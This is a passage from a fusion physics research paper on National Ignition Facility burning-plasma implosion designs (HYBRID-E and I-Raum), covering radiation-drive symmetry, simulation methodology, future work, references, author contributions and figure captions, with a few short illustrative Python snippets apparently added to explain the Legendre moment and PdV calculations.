The designs in this paper have not yet reached this limit of diminishing returns when reducing the coast time, and further improvements can be made on both platforms. DT dense-shell non-uniformities, or ρR variations, at peak compression, which can arise from early-time radiation flux asymmetries, are minimized by controlling the 'foot' of the radiation drive (the time until the rise to peak power) using cone-fraction balancing. The cone fraction is defined as the ratio of the inner-beam laser power to the total laser power. The normalized Legendre decomposition of the radiation flux moment (P2/P0) at the foot of the pulse (before the rise to peak laser power) is designed to be as close to zero as possible, but is allowed to vary during the peak of the pulse to enable the full use of NIF (33% cone fraction), and may deviate from zero at early times due to as-shot laser delivery (Extended Data Fig. 1). During the peak of the laser pulse, the inner beams can initially propagate easily and the radiation flux asymmetry has a negative sign in P2/P0 (higher drive at the waist of the hohlraum). Near the end of peak power, the inner beams have more difficulty propagating beyond the expanding wall and ablator material, and the sign of the P2/P0 flux changes. Changing the radiation flux asymmetry during the peak of the pulse is not detrimental to the implosion as long as the flux asymmetry can be balanced to provide a symmetric final dense shell and hot spot, and the symmetry of the implosion itself is not fluctuating. This is assessed in simulations and experiments through the shape of the implosion at ~200 μm compared with peak compression at ~40 μm. The P2/P0 flux asymmetry is similar in magnitude between the designs, but its sign changes faster for HYBRID-E due to the longer pulse and larger capsule, which also require more transfer early in the pulse to compensate for the late-time P2/P0 sign change. The primary impact of increasing the CBET is to shift the P2/P0 radiation flux during the peak of the pulse to more negative values, while maintaining symmetry during the 'foot'; it does not substantially change the slope of the time-dependent P2/P0 (ref. 11). Until the time when substantial plasma filling and LEH closure come into play, radiation hydrodynamic simulations tuned to previous data are very predictive in designing symmetric shocks viewed along the pole and equator, a metric for the 'foot' P2 flux asymmetry (Methods). Even when using CBET to control symmetry during the peak of the pulse, the radiation drive symmetry during the foot of the pulse can be accurately predicted and modelled with no artificial multipliers in low-gas-fill hohlraums11,12,42. The P4/P0 flux asymmetry is mainly determined by the CCR, picket power and outer-beam pointing; the differences between the designs lead to a slightly worse calculated P4/P0 flux asymmetry for I-Raum compared with HYBRID-E in the 'foot' of the laser pulse.
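For readers unfamiliar with the P2/P0 and P4/P0 notation used throughout, the sketch below shows the underlying projection: a flux distribution over polar angle is decomposed onto Legendre polynomials, and the normalized moments quantify the asymmetry. The 5% perturbation is a made-up example, not data from these experiments.

```python
import numpy as np

# Normalized Legendre moments (P2/P0, P4/P0) of a radiation-flux profile,
# as used in the text to quantify drive asymmetry. The flux below carries
# a made-up 5% P2 perturbation, not data from these experiments.
def legendre_moments(mu, flux, max_order=4):
    """Project flux(mu), mu = cos(theta), onto even Legendre polynomials."""
    moments = {}
    for n in range(0, max_order + 1, 2):
        Pn = np.polynomial.legendre.Legendre.basis(n)(mu)
        # a_n = (2n + 1)/2 * integral of flux * P_n over mu in [-1, 1]
        moments[n] = (2 * n + 1) / 2 * np.trapz(flux * Pn, mu)
    return moments

mu = np.linspace(-1.0, 1.0, 2001)
flux = 1.0 - 0.05 * 0.5 * (3 * mu**2 - 1)   # pure P2 flux perturbation
m = legendre_moments(mu, flux)
print(f"P2/P0 = {m[2] / m[0]:+.3f}   P4/P0 = {m[4] / m[0]:+.3f}")
# Prints P2/P0 = -0.050 and P4/P0 = +0.000: a negative P2/P0 corresponds
# to higher drive at the hohlraum waist, following the text's convention.
```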
Continued discussion on optimization and reproducibility

The progression of the design or experimental optimization within the HYBRID-E and I-Raum campaigns is shown in Fig. 2 through several example points (open and closed symbols), illustrating that the benefit of increased capsule energy is realized only when the pressure is also maintained through the other terms in equation (1). In addition to the reduction in 'coast time' in moving from the 1,100 μm to the 1,050 μm inner-radius HYBRID-E implosions, the stability and low-mode asymmetries were also improved in the campaign optimizations for HYBRID-E and I-Raum. For example, comparing I-Raum experiments N190217 and N191105 shows the impact on the neutron yield of mitigating high-mode instabilities by reducing the number of ablator defects and improving the design stability using a higher picket. The implosion efficiency term η (ref. 23 and Extended Data Table 1) estimates the reduction in yield due to radiative loss from the hot spot and cold fuel; this loss was reduced as the capsule quality was improved between these experiments. Capsule defects that can seed high-mode perturbations, other than the support tent and DT fill tube, are still present in the HYBRID-E experiments19, and further improvement could lead to higher performance19. Both designs are predicted to perform better with a reduction in DT fill tube size, which can otherwise result in ablator mix into the hot spot19; experiments to test this are ongoing. Improving the low-mode radiation drive asymmetries, which is challenging at a larger scale, also enabled the efficient conversion of capsule-absorbed energy to hot-spot internal energy. This is shown by the increase in performance of I-Raum designs N201122 and N210220 compared with N191105, which improved the symmetry by introducing a small amount of wavelength detuning (Δλ = 0.5 Å). A metric for the improvement in symmetry is the level of oblateness of the implosion, namely, the mode 2 coefficient of the Legendre decomposition of the 17% intensity contour of the primary neutron image (P2) (Extended Data Table 1). The HYBRID-E experiments also improved the symmetry by reducing the amount of wavelength detuning, from 1.75 Å in N201101 to 1.55 Å in N210307 and N210207, improving performance by 40–70%. Both designs control the time-dependent radiation flux symmetry during the early part of the laser pulse by fine-tuning the laser power balance. Although the intrinsic low-mode asymmetries were improved to reach high performance, as-shot laser power variations and target non-uniformities resulted in odd-mode asymmetries that are calculated to impact the performance and are worse for the I-Raum experiments19. Additional tests to reduce these non-uniformities are ongoing. HYBRID-E experiment N210307 was similar to N210207 with regard to the hohlraum configuration, capsule size, ice thickness, shock timing, wavelength separation and velocity, but used different HDC capsules with a larger number of known degradations in the ablator that can seed hydrodynamic instabilities. There were also some differences in the calculated hydrodynamic stability due to differences in the as-delivered W dopant percentage and crystal structure of the ablator. Nonetheless, these experiments performed similarly, even with the differences in capsule quality and low-mode asymmetry (primary neutron image P2), which provides confidence in the reproducibility of the burning plasma results for near-neighbour designs. In I-Raum experiment N210220, compared with N201122, an intentional laser imbalance was applied in an attempt to mitigate the known sources of Legendre mode 1 asymmetry in the implosion, seeded by the hohlraum diagnostic windows and ablator thickness non-uniformity. Detailed analyses and understanding of these experiments are ongoing.

Simulation methodology

Optimizations to the target designs were studied through numerical simulations (HYDRA21) and using semi-empirical models26 to guide design choices relating to the radiation drive symmetry during the peak of the laser pulse, which is difficult to model.
Once adjusted using power multipliers, the numerical simulations are generally predictive in calculating the implosion energetics for finite changes in the design space, for example, changes in the laser pulse power history or capsule parameters in the same hohlraum configuration. These simulations can be extrapolated further in the design space to explore new hohlraum configurations, but with more uncertainty, and may need to be recalibrated. The numerical simulations can also very accurately predict the radiation drive symmetry during the 'foot' of the pulse11,12, until the rise to peak laser power, in the presence of large amounts of CBET, specifically enabled by using low-gas-fill hohlraums. However, the simulations cannot accurately and consistently model the radiation flux symmetry during the main part of the laser pulse (peak power), and controlling the symmetry during this part of the pulse is critical for achieving adequate implosion symmetry. As part of the HYBRID strategy1, we use data-driven models26 to predict the symmetry during this part of the pulse and to guide design choices such as the hohlraum size, the laser-beam pointing, the amount of energy in the outer beams during the early part of the pulse and so on. To additionally estimate the impact of wavelength detuning on implosion symmetry, we combine this data-driven model26 with an experimentally measured sensitivity of implosion symmetry to wavelength detuning11.

The numerical simulation methodology used for platform design (idealized conditions before the shot) and post-shot analysis (incorporating information from the experiment, such as the delivered laser pulse and the measured hohlraum and capsule dimensions) is a two-step process. The radiation hydrodynamic simulations include multigroup radiation transport; non-local thermodynamic equilibrium (NLTE) atomic kinetics (required for modelling high-atomic-number hohlraums and capsule ablation) using detailed configuration accounting (LLNL 2010 DCA atomic models)43; three-dimensional ray tracing for the laser-light interaction with the hohlraum wall and plasma, with a detailed account of the transfer of energy between beams; detailed equation-of-state and opacity models; Monte Carlo transport of the fusion products; and electron thermal conduction using Livermore equation of state (LEOS) tables with a flux limiter of \(0.15\,n_{\mathrm{e}}T_{\mathrm{e}}v_{T\mathrm{e}}\), where ne is the electron density, Te is the electron temperature and vTe is the electron thermal velocity. First, lower-spatial-resolution integrated capsule-and-hohlraum simulations model the radiation drive with spatial, temporal and photon-energy resolution (Fig. 1). These simulations require calibration of the drive magnitude and symmetry during the peak of the pulse to match experimental measurements from separate focused or calibration experiments for each platform11,17,44. If some aspect of the design is changed, such as the size of the LEH, the calibrated models are used to extrapolate the plasma conditions; the calibration experiments can also be revisited with parameters closer to the modified design. The radiation drive is extracted from these lower-resolution integrated hohlraum-and-capsule simulations and imposed on higher-resolution capsule-only simulations45,46 in two dimensions with symmetry along the axis (Extended Data Fig. 4), which can resolve a larger number of modes (up to mode 200).
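For a rough sense of scale of the flux-limited conduction model quoted above, the sketch below evaluates the free-streaming limit 0.15 n_e T_e v_Te for assumed hohlraum-like plasma conditions; the density and temperature here are illustrative choices, not quantities from the paper.

```python
import math

# Flux-limited electron heat conduction: the Methods quote a limiter of
# 0.15 * n_e * T_e * v_Te. The plasma conditions below are assumed,
# hohlraum-like values for illustration, not numbers from the paper.
kB_keV = 1.602e-16      # J per keV
m_e = 9.109e-31         # electron mass, kg

n_e = 1e27              # electron density, m^-3 (~1e21 cm^-3, assumed)
T_e_keV = 3.0           # electron temperature, keV (assumed)

T_e = T_e_keV * kB_keV                    # J
v_Te = math.sqrt(T_e / m_e)               # electron thermal velocity, m/s
q_max = 0.15 * n_e * T_e * v_Te           # flux-limited maximum, W/m^2
print(f"v_Te ~ {v_Te:.2e} m/s")
print(f"flux-limited q_max ~ {q_max / 1e4:.2e} W/cm^2")
```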
These capsule-only simulations also include models for the engineering features in the target (capsule support, fill tube, roughness of the capsule and ice layer) as well as low-mode perturbations from the radiation flux asymmetries. The calculations for the four experiments in this paper use some combination of the known perturbations, which may differ between the experiments, but under-predict the performance when all the known perturbations are applied; thus, the choice of applied perturbations made to match the observed level of neutron production may impact the relative agreement with other key metrics. Extended Data Fig. 4 compares the simulated (middle) to the measured fluence-compensated down-scattered neutron images47 (top), which provide a picture of the burn-averaged compressed dense shell surrounding the hot spot for the experiments in this paper. Although three-dimensional features cannot be captured by two-dimensional simulations, the main features and sizes of the compressed shells are generally reproduced (Table 1) for comparison with other implosion metrics. For example, the simulations replicate the higher-density features at the poles for N210207 and N201122, as well as the low-density region at the north pole for N201101, because the as-shot laser asymmetry is captured by the simulations. The simulated density and temperature images corresponding to these calculations at peak neutron production are shown in Extended Data Fig. 4, bottom. The visible simulated mode 4 perturbation in experiment N210207 is not a result of the capsule support tent model, but of the applied roughness spectrum coupled with the low-mode radiation drive asymmetries.

To calculate the amount of PdV work done on the hot spot, we track a constant mass that encompasses 98% of the neutron production at peak neutron emission. The pressure and change in volume of this mass (with volume weighting) are calculated to give the cumulative net PdV work on the hot spot, the radiation loss from the hot spot and the alpha heating of the hot spot as a function of time (Fig. 3). This hot-spot boundary is chosen to incorporate enough mass that conduction losses may be neglected. We use the PdV work calculated at the time of peak neutron production for the simulations where alpha-particle heating is artificially turned off ('burn off'), so that the estimate of the mechanical work done on the hot spot by the imploding fuel and shell is not influenced by alpha heating. The ratios of the alpha-heating energies to the work done on the hot spot, at 'bang time' and in total, are the main metrics for a burning plasma. The yield amplification (Yamp), the ratio of the neutron yield in simulations that allow alpha particles to redeposit their energy to that in simulations where this is artificially prohibited, is another metric for the impact of alpha-particle heating on the implosion and for a burning plasma. The performance of the HYBRID-E and I-Raum designs can be matched in two dimensions using a subset of the known degradations, whereas applying all the degradations under-predicts the performance. To assess the impact of the perturbation choice on the calculated yield amplification, simulations of these designs with different choices or magnitudes of perturbations were performed, for example, variations in the surface roughness, tent model, fill tube model, low-mode asymmetries, capsule-thickness non-uniformities and the mix model at the fuel–ablator interface.
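To make the PdV bookkeeping described above concrete, here is a minimal sketch in which a fixed tracked mass is compressed and re-expanded along a toy adiabatic trajectory and the cumulative work is accumulated. The trajectory and units are entirely artificial; real values come from the HYDRA simulations.

```python
import numpy as np

# Toy version of the cumulative PdV bookkeeping described in the text:
# track a fixed mass (the hot spot) and accumulate -P dV as its volume
# changes. The trajectory below is artificial, not HYDRA output.
t = np.linspace(-0.4, 0.2, 601)            # ns, relative to bang time
volume = 1.0 + 4.0 * t**2                  # arb. units, minimum at t = 0
pressure = 1.0 / volume ** (5.0 / 3.0)     # adiabatic toy model

dV_dt = np.gradient(volume, t)
work_rate = -pressure * dV_dt              # positive while compressing
cumulative_pdv = np.concatenate(
    ([0.0], np.cumsum(0.5 * (work_rate[1:] + work_rate[:-1]) * np.diff(t))))

print(f"PdV work up to bang time: {cumulative_pdv[t <= 0][-1]:+.3f} (arb.)")
print(f"net PdV work at end:      {cumulative_pdv[-1]:+.3f} (arb.)")
# Compression does positive work on the tracked mass before bang time;
# re-expansion after stagnation takes some of it back, as in Fig. 3.
```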
Extended Data Fig. 3 shows a clear trend in Yamp with total neutron yield for HYBRID-E (red) and I-Raum (blue), even for simulations with varying calculated down-scattered ratios (a measure of the areal density of the compressed shell). The red and blue lines in Extended Data Fig. 3 correspond to the total yields for the experiments in this paper, showing that all four experiments are calculated to meet the yield amplification criterion for a burning plasma of >3.5. Other metrics for alpha-particle heating include the increases in the simulated hot-spot mass, deuterium–tritium (DT) and deuterium–deuterium (DD) ion temperatures, hot-spot pressure and hot-spot internal energy compared with simulations where alpha-particle heating is artificially turned off (no-α) (Table 1).

Future studies

Future studies are aimed at continuing to optimize the key metrics in equation (1). Fielding LEHs smaller than the present values of 3.10–3.64 mm will improve the late-time ablation pressure by maintaining a higher Tr later in time (lower radiation losses). In addition, smaller-LEH hohlraums can achieve radiation temperatures similar to the designs in this work at lower power, which enables longer-duration pulses even with a fixed available laser energy, further improving the late-time ablation pressure. The smaller-LEH hohlraums can also be used to field thicker-ablator implosions, for example, more than 4 μm thicker at the 1,050 μm inner-radius scale and more than 10 μm thicker at the 1,100 μm inner-radius scale, which is expected to improve the design stability and enable higher implosion velocities at similar levels of ablator mass remaining. Based on the modest levels of CBET presently needed to control symmetry, we expect that achieving adequate symmetry in a smaller-LEH hohlraum will be manageable. The impact of the thickness of the DT ice layer is also being investigated. Simulation studies that increase the implosion convergence through reductions in the implosion adiabat, while controlling the accompanying tendency towards more hydrodynamic instability, are also being performed. Finally, experiments to further increase the implosion scale by 5–30% while maintaining the other critical properties in equation (1) are underway.

Data availability

Raw data were generated at the National Ignition Facility and are not available to the general public. Derived data supporting the findings of this study are available from the corresponding authors upon request.

Code availability

The simulation codes used in this manuscript are not available to the general public.

References

1. Hurricane, O. A. et al. Beyond alpha-heating: driving inertially confined fusion implosions toward a burning-plasma state on the National Ignition Facility. Plasma Phys. Control. Fusion 61, 014033 (2019).
2. Betti, R. et al. Alpha heating and burning plasmas in inertial confinement fusion. Phys. Rev. Lett. 114, 255003 (2015).
3. Hurricane, O. A. et al. Approaching a burning plasma on the NIF. Phys. Plasmas 26, 052704 (2019).
4. National Academies of Sciences, Engineering, and Medicine. Final Report of the Committee on a Strategic Plan for U.S. Burning Plasma Research (National Academies Press, 2019).
5. Lindl, J. D., Haan, S. W., Landen, O. L., Christopherson, A. R. & Betti, R. Progress toward a self-consistent set of 1D ignition capsule metrics in ICF. Phys. Plasmas 25, 122704 (2018).
6. Christopherson, A. R. et al. Theory of ignition and burn propagation in inertial fusion implosions. Phys. Plasmas 27, 052708 (2020).
7. Atzeni, S. & Meyer-ter-Vehn, J. The Physics of Inertial Fusion: Beam Plasma Interaction, Hydrodynamics, Hot Dense Matter (Oxford Univ. Press, 2004).
8. Moses, E. The National Ignition Facility: an experimental platform for studying behavior of matter under extreme conditions. Astrophys. Space Sci. 336, 3–7 (2011).
9. Le Pape, S. et al. Fusion energy output greater than the kinetic energy of an imploding shell at the National Ignition Facility. Phys. Rev. Lett. 120, 245003 (2018).
10. Casey, D. T. et al. The high velocity, high adiabat, 'Bigfoot' campaign and tests of indirect-drive implosion scaling. Phys. Plasmas 25, 056308 (2018).
11. Kritcher, A. L. et al. Achieving record hot spot energies with large HDC implosions on NIF in HYBRID-E. Phys. Plasmas 28, 072706 (2021).
12. Kritcher, A. L. et al. Energy transfer between lasers in low-gas-fill-density hohlraums. Phys. Rev. E 98, 053206 (2018).
13. Zylstra, A. B. et al. Record energetics for an inertial fusion implosion at NIF. Phys. Rev. Lett. 126, 025001 (2021).
14. Kruer, W. L., Wilks, S. C., Afeyan, B. B. & Kirkwood, R. K. Energy transfer between crossing laser beams. Phys. Plasmas 3, 382–385 (1996).
15. Glenzer, S. H. et al. Symmetric inertial confinement fusion implosions at ultra-high laser energies. Science 327, 1228–1231 (2010).
16. Michel, P. et al. Tuning the implosion symmetry of ICF targets via controlled crossed-beam energy transfer. Phys. Rev. Lett. 102, 025004 (2009).
17. Robey, H. F., Berzak Hopkins, L., Milovich, J. L. & Meezan, N. B. The I-Raum: a new shaped hohlraum for improved inner beam propagation in indirectly-driven ICF implosions on the National Ignition Facility. Phys. Plasmas 25, 012711 (2018).
18. Zylstra, A. B. et al. Burning plasma achieved in inertial fusion. Nature https://doi.org/10.1038/s41586-021-04281-w (2022).
19. Ross, J. S. et al. Experiments conducted in the burning plasma regime with inertial fusion implosions. Preprint at https://arxiv.org/pdf/2111.04640 (2021).
20. Marinak, M. M. et al. Advances in HYDRA and its applications to simulations of inertial confinement fusion targets. EPJ Web Conf. 59, 06001 (2013).
21. Marinak, M. M. et al. Three-dimensional HYDRA simulations of National Ignition Facility targets. Phys. Plasmas 8, 2275–2280 (2001).
22. Kritcher, A. L. et al. Metrics for long wavelength asymmetries in inertial confinement fusion implosions on the National Ignition Facility. Phys. Plasmas 21, 042708 (2014).
23. Pak, A. et al. Impact of localized radiative loss on inertial confinement fusion implosions. Phys. Rev. Lett. 124, 145001 (2020).
24. Baker, K. L. et al. Fill tube dynamics in inertial confinement fusion implosions with high density carbon ablators. Phys. Plasmas 27, 112706 (2020).
25. Nagel, S. R. et al. Effect of the mounting membrane on shape in inertial confinement fusion implosions. Phys. Plasmas 22, 022704 (2015).
26. Callahan, D. A. et al. Exploring the limits of case-to-capsule ratio, pulse length, and picket energy for symmetric hohlraum drive on the National Ignition Facility Laser. Phys. Plasmas 25, 056305 (2018).
27. Ralph, J. E. et al. The influence of hohlraum dynamics on implosion symmetry in indirect drive inertial confinement fusion experiments. Phys. Plasmas 25, 082701 (2018).
28. Lindl, J. D. et al. Review of the national ignition campaign 2009–2012. Phys. Plasmas 21, 020501 (2014).
29. Hurricane, O. A. et al. Fuel gain exceeding unity in an inertially confined fusion implosion. Nature 506, 343–348 (2014).
30. Dewald, E. L. et al. Hot electron measurements in ignition relevant hohlraums on the National Ignition Facility. Rev. Sci. Instrum. 81, 10D938 (2010).
31. Kritcher, A. L. et al. Integrated modeling of cryogenic layered highfoot experiments at the NIF. Phys. Plasmas 23, 052709 (2016).
32. Berzak Hopkins, L. F. et al. First high-convergence cryogenic implosion in a near-vacuum hohlraum. Phys. Rev. Lett. 114, 175001 (2015).
33. Turnbull, D. et al. Symmetry control in subscale near-vacuum hohlraums. Phys. Plasmas 23, 052710 (2016).
34. Divol, L. et al. Symmetry control of an indirectly driven high-density-carbon implosion at high convergence and high velocity. Phys. Plasmas 24, 056309 (2017).
35. Clark, D. S. et al. Three-dimensional modeling and hydrodynamic scaling of National Ignition Facility implosions. Phys. Plasmas 26, 050601 (2019).
36. Hurricane, O. A. et al. On the importance of minimizing 'coast-time' in X-ray driven inertially confined fusion implosions. Phys. Plasmas 24, 092706 (2017).
37. Bishop, B. National Ignition Facility experiment puts researchers at threshold of fusion ignition. Lawrence Livermore National Laboratory https://www.llnl.gov/news/national-ignition-facility-experiment-puts-researchers-threshold-fusion-ignition (2021).
38. MacFarlane, J. J. VISRAD—a 3-D view factor code and design tool for high-energy density physics experiments. J. Quant. Spectrosc. Radiat. Transfer 81, 287–300 (2003).
39. Williams, O. A. & Nesládek, M. Growth and properties of nanocrystalline diamond films. Phys. Stat. Sol. A 203, 3375–3386 (2006).
40. Berzak Hopkins, L. et al. Increasing stagnation pressure and thermonuclear performance of inertial confinement fusion capsules by the introduction of a high-Z dopant. Phys. Plasmas 25, 080706 (2018).
41. Berzak Hopkins, L. et al. Toward a burning plasma state using diamond ablator inertially confined fusion (ICF) implosions on the National Ignition Facility (NIF). Plasma Phys. Control. Fusion 61, 014023 (2019).
42. Pickworth, L. A. et al. Application of cross-beam energy transfer to control drive symmetry in ICF implosions in low gas fill hohlraums at the National Ignition Facility. Phys. Plasmas 27, 102702 (2020).
43. Patel, M. V., Scott, H. A. & Marinak, M. M. The HYDRA DCA atomic kinetics package. In 52nd Annual Meeting of the APS Division of Plasma Physics Vol. 52, NO5.008 (APS, 2010).
44. Jones, O. S. et al. A high-resolution integrated model of the National Ignition Campaign cryogenic layered experiments. Phys. Plasmas 19, 056315 (2012).
45. Clark, D. S. et al. Detailed implosion modeling of deuterium-tritium layered experiments on the National Ignition Facility. Phys. Plasmas 20, 056318 (2013).
46. Clark, D. S. et al. Capsule modeling of high foot implosion experiments on the National Ignition Facility. Plasma Phys. Control. Fusion 59, 055006 (2017).
47. Casey, D. T. et al. Fluence-compensated down-scattered neutron imaging using the neutron imaging system at the National Ignition Facility. Rev. Sci. Instrum. 87, 11E715 (2016).

Acknowledgements

We thank B. Coppi (MIT), S. C. Cowley (PPPL), D. Whyte (MIT), J. Hammer (LLNL), M. Farrell (GA) and J. Kline (LANL) for thoughtful discussions. The contributions of the NIF operations and target fabrication teams to the success of these experiments are gratefully acknowledged. This work was performed under the auspices of the US Department of Energy by Lawrence Livermore National Laboratory under contract DE-AC52-07NA27344. This document was prepared as an account of work sponsored by an agency of the US government. Neither the US government nor Lawrence Livermore National Security, LLC, nor any of their employees makes any warranty, expressed or implied, or assumes any legal liability or responsibility for the accuracy, completeness or usefulness of any information, apparatus, product or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial product, process or service by trade name, trademark, manufacturer or otherwise does not necessarily constitute or imply its endorsement, recommendation or favouring by the US government or Lawrence Livermore National Security, LLC. The views and opinions of the authors expressed herein do not necessarily state or reflect those of the US government or Lawrence Livermore National Security, LLC, and shall not be used for advertising or product endorsement purposes. LLNL-JRNL-821690-DRAFT.

Author contributions

A.L.K.: HYBRID-E design lead, integrated hohlraum group lead and wrote sections of the paper. C.V.Y.: present I-Raum design lead and wrote sections of the paper. H.F.R.: original I-Raum design lead. C.R.W.: capsule/instability physics. A.B.Z.: hot-spot analysis lead, HYBRID-E experimental lead. O.A.H.: capsule scale/burning plasma strategy, theory, zero-dimensional hot-spot models and wrote sections of the paper. D.A.C.: empirical hohlraum P2 model and hohlraum strategy. J.E.R.: N201101 and N210207 experimentalist and shot responsible individual (shot RI). J.S.R.: I-Raum experimental lead and N201122 shot RI. K.L.B.: HYBRID shot RI. D.T.C.: HYBRID shot RI. D.S.C.: capsule/instability physics. T.D.: HYBRID shot RI. L.D.: three-dimensional hot-spot analysis. M.H.: HYBRID shot RI. L.B.H.: HDC design and campaign lead. S.L.P.: HYBRID shot RI. N.B.M.: advanced hohlraum lead. A.P.: HYBRID and I-Raum shot RI as well as physics of capsule engineering defects. P.K.P.: one-dimensional hot-spot analysis as well as Yamp and GLC inference. R.T.: HYBRID shot RI. S.J.A.: capsule microstructure physics. P.A.A.: hohlraum physics. L.J.A.: engineering and targets. B.B.: penumbral X-ray diagnostic. D.B.: computational physics. L.R.B.: X-ray framing camera. R.B.: inertially confined fusion (ICF) physics/ignition theory. S.D.B.: cryo-layering. J.B.: diamond capsule fabrication and materials science. R.M.B.: real-time neutron activation detector nuclear diagnostic. N.W.B.: neutron diagnostics. E.J.B.: project engineering. D.K.B.: diagnostics. T.B.: capsule fabrication and metrology. T.M.B.: cryo-layering. M.W.B.: project engineering. P.M.C.: deuterium–tritium equation-of-state measurements. B.C.: HYDRA code development. T.C.: laser plasma instability physics.
H.C.: gated laser entrance hole X-ray diagnostic. C.C.: target fabrication planning. A.R.C.: ignition theory. J.W.C.: capsule fabrication. E.L.D.: experiments. T.R.D.: capsule physics. M.J.E.: program management. W.A.F.: hohlraum physics. J.E.F.: 2DConA image analysis. D.F.: nuclear diagnostics. J.A.F.: magnetic recoil spectrometer nuclear diagnostic. J.A.G.: ensemble simulations. M.G.J.: magnetic recoil spectrometer diagnostic. S.H.G.: ICF physics. G.P.G.: nuclear diagnostics. S.H.: capsule physics and cryogenic deuterium–tritium ice-layer analysis. K.D.H.: neutron diagnostics. G.N.H.: experiments. B.A.H.: capsule physics. J.H.: computational physics. E.H.: nuclear time-of-flight diagnostics. J.E.H.: laser delivery quality control and improvements. V.J.H.: laser delivery quality control and improvements. H. Herrmann: gamma diagnostics. M.C.H.: programme management. D.E.H.: hohlraum physics and CBET studies in HYBRID-C. D.D.H.: capsule physics. J.P.H.: X-ray diagnostics. W.W.H.: management. H. Huang: capsule fabrication. K.D.H.: ensemble simulations. N.I.: X-ray diagnostics. L.C.J.: X-ray diagnostics. J.J.: neutron diagnostics. O.J.: hohlraum physics. G.D.K.: HYDRA code development. S.M.K.: neutron diagnostics. S.F.K.: X-ray diagnostics and analysis. J.K.: diagnostic management. Y.K.: gamma diagnostics. H.G.K.: gamma diagnostics. V.G.K.: neutron diagnostics. C.K.: capsules. J.M.K.: HYDRA code development. M.K.G.K.: ensemble simulations. J.J.K.: targets. B.K.: ensemble simulations. O.L.L.: velocity analysis. S.L.: laser–plasma instability (PF3D) code development. D.L.: NIF facility management. N.C.L.: optical diagnostics. J.D.L.: ICF physics. T.M.: ICF physics. M.J.M.: X-ray diagnostics. B.J.M.: mode 1 analysis and back-scatter. A.J.M.: diagnostic management. S.A.M.: integrated design physics. A.G.M.: X-ray diagnostics. M.M.M.: HYDRA code development lead. D.A.M.: X-ray diagnostics. E.V.M.: X-ray diagnostics. L.M.: capsule physics. K.M.: gamma diagnostics. P.A.M.: LPI physics. M.M.: optical diagnostics. J.L.M.: hohlraum physics. J.D.M.: hohlraum physics. A.S.M.: neutron diagnostics. J.W.M.: hohlraum physics. T.M.: neutron and gamma diagnostics. K.N.: project engineering. J.-M.G.D.N.: laser delivery quality control and improvements. A.N.: target fabrication engineering, capsule and fabrication planning. R.N.: simulations of ensembles. M.V.P.: HYDRA code development. L.J.P.: laser delivery quality control and improvements. J.L.P.: simulations of ensembles. Y.P.: hohlraum physics. B.B.P.: hohlraum physics. M.R.: capsule fabrication. N.G.R.: capsule fabrication. H.R.: real-time neutron activation detector mode 1 analysis. M.R.: hohlraum physics. M.S.R.: X-ray diagnostics. J.D.S.: hohlraum physics. J.S.: mode 1 analysis. S.S.: capsules. D.J.S.: neutron diagnostics. M.B.S.: hohlraum diagnostics. C.R.S.: HYDRA code development. H.A.S.: NLTE opacities (Cretin) code development. S.M.S.: HYDRA code development. K.S.: mode 1 metrology. M.W.S.: kinetic physics. S.S.: sagometer data and particle analysis. V.A.S.: capsule physics. B.K.S.: ensemble simulations. P.T.S.: dynamic model and ignition theory. M.S.: capsules. S.S.: X-ray diagnostics. D.J.S.: hohlraum/LPI physics. L.J.S.: hohlraum physics. C.A.T.: Bigfoot design physics. R.P.J.T.: program management. C.T.: X-ray diagnostics. E.R.T.: optical diagnostics. P.L.V.: neutron imaging diagnostics. K.W.: X-ray diagnostics. C.W.: capsule fabrication. C.H.W.: neutron diagnostics. B.M.V.W.: NIF operations lead. D.T.W.: hohlraum physics.
B.N.W.: project engineering. M.Y.: capsule fabrication. S.T.Y.: laser delivery quality control and improvements. G.B.Z.: computational physics lead.

Corresponding authors: Correspondence to A. L. Kritcher or C. V. Young.

Competing interests: The authors declare no competing interests.

Peer review information: Nature Physics thanks Erik Lefebvre, Robbie Scott and the other, anonymous, reviewer(s) for their contribution to the peer review of this work.

Publisher's note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Extended data

Extended Data Fig. 1: Radiation flux asymmetries. Calculated normalized Legendre decompositions of the radiation flux moments (P1/P0 in blue, P2/P0 in red and P4/P0 in grey) as a function of time, with a dashed horizontal line at zero asymmetry. The incident cone fraction (ratio of inner-beam power to total power) and the laser power profiles are shown below the radiation flux asymmetries for HYBRID-E (top) and I-Raum (bottom). The total laser power as a function of time is shown before (solid) and after (dashed) drive multipliers are applied to the pulse to match experimental data.

Extended Data Fig. 2: Linear growth factors for high-mode perturbations. Ablation-front growth factors (AFGF) (top) and fuel–ablator interface growth factors (FAGF) (bottom) as a function of mode number at peak implosion velocity for HYBRID-E (black) and I-Raum (red), showing a tradeoff in design stability at the two interfaces due to differences in the dopant layer thickness. The shaded bands show the growth factors at ±50 ps from peak implosion velocity.

Extended Data Fig. 3: Neutron yield amplification from alpha heating. Calculated yield amplification, the ratio of the total yield including alpha-particle heating to the yield from simulations where alpha-particle heating is artificially turned off, for HYBRID-E (red) and I-Raum (blue) as a function of total yield. Each point is a high-resolution capsule simulation applying a different combination of the known perturbations. The lines correspond to the total measured yields from the four experiments discussed in the main text (N201101, N201122, N210207 and N210220).

Extended Data Fig. 4: Shell and hot-spot configurations at peak neutron production. Each image is 200 × 200 μm with colour scale(s) normalized to the maximum value(s) in that panel. Top row: measured fluence-compensated down-scattered neutron images (FC-DSNI) for each shot; red indicates regions of higher areal density and neutron scatter. Centre row: simulated FC-DSNI images from 2D radiation-hydrodynamic capsule-only simulations for each shot with known degradations, including the capsule support tent and fill tube (low-mode mix), surface roughness (high-mode mix), X-ray drive asymmetries and as-fabricated shell non-uniformity. Bottom row: simulated density (left) and ion temperature (right) maps at peak neutron production. The maximum (density, ion temperature) values for each panel, left to right, in (g cm–3, keV) are (350, 7.31), (450, 6.49), (350, 8.4) and (450, 7.2).

Extended Data Fig. 5: Target dimensions. Schematics of the HYBRID-E (a) and I-Raum (b) designs showing the nominal target dimensions for the hohlraums (left) and pie charts for the central DT-fuel-filled capsules (right). The HDC ablator consists of a ~5-μm-thick inner undoped HDC layer, followed by a tungsten (W)-doped HDC layer at larger radii and an outer undoped HDC layer.
See Extended Data Table 1 for additional design parameters.

Extended Data Table 1: Implosion efficiency and symmetry optimization for example experiments in Fig. 2

Extended Data Table 2: Additional design parameters

Rights and permissions

